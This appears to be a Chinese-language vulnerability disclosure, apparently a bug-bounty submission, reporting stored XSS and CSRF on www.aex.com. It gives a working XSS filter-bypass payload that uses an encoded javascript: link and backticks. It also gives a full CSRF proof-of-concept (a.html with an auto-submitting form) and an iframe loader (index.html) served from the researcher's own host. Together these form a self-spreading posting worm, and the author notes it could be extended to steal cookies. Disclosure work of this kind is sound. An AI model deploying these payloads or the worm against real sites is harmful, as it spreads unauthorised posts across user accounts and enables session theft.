漏洞URL:
https://www.aex.com
简要描述:
存在存储型xss 和csrf 发现可以进行蠕虫攻击 这里演示一个存储弹窗的xss 和一个简单的蠕虫,
没有进一步的测试 但是发现发表的文章可以推到首页,或者在修改密码之类的存在csrf(这个还未测试)
漏洞证明:
一、存储xss
1、首先我们需要注册一个账号 并且登陆进去
2.点击左上角的 发布(可以改成中文)
3、在文本框内输入 <a href=%26%23106avascript:aler%26%23116`1`>xss 点击发布 之后在弹出的对话框 点击去看看 发现好像来到自己的空间。
4.点击自己刚才发的xss 会发生弹窗,
5.这里说明一下 我是如何进行绕过的(浪费审核大大 一分钟):
(1)经过测试发现所有的事件都不能使用 只能通过构造属性来xss
(2)iframe标签pass了 所以只能考虑使用伪协议 这里我用的是a 标签
(3)javascript关键字过滤了,所以绕过 alert也是
(4)我将javascript中的j字符,先html十进制编码,再url编码 同理alert中的a业是这样
(5)使用反单引号来代替小括号
二、蠕虫 csrf+xss
1.发表文章处存在csrf 这里测试系统有两个
一个是我的mac 账号名称hlx01 ID 647968
一个虚拟机win 账号名称HLX02 ID 64817
2、首先使用大号hlx01 随意发表一些内容 比如emmmmmm。。发一个test123吧
3.使用burp抓取数据包 制作csrf poc 到虚拟机中 建立1.html 进行测试
4、在虚拟中执行 发现可以 存在csrf
5.这里我们还是使用大号写一个存储的xss 内容为<A HREF="http://www.hlxa.top/index.html">xsstest</A>
使用burp构造poc 并且放在我的服务器上的a.html中
index.html 是我上传到服务器的一个poc,他会调用我服务器上的a.html,并且会跳转到原来页面
a.html代码如下
index.html 是调用a.html 和跳转的代码如下
a.html中 是csrf的poc 加上模拟用户提交 当用户点击会 自动发表一篇和我大号一样的文章 当其他人再次点击还会发表这样的文章 并且代码上进行了简单的处理。。。。。
6.查看大号的返回值 这就是开始的蠕虫攻击起始页面 url为 https://www.aex.com/page/article.html?id=15523
7.小号在虚拟机中 访问https://www.aex.com/page/article.html?id=15523 并且点击xsstest
8.发现存在蠕虫
漏洞利用代码:
a.html
<html>
<!-- CSRF PoC - generated by Burp Suite Professional -->
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://www.aex.com/sns/postPublish.php?n=0.3039233027036632" method="POST">
<input type="hidden" name="post_type" value="1" />
<input type="hidden" name="post_content" value="<A HREF="http://www.hlxa.top/index.html">xsstest</A>" />
<input type="submit" value="Submit request" />
</form>
<script type="text/javascript">
var form = document.getElementsByTagName('form')[0];
form.submit();
</script>
</body>
</html>
index.html
<iframe src="a.html"></iframe><meta http-equiv=refresh content="1;url=https://www.aex.com/page/personal_column.html">
还有一点 就是 随便发的测试文章 都能提示推到首页 要是构造获取他人cookie的csrf蠕虫 哪场面。。。。。。。
修复方案:增加过滤机制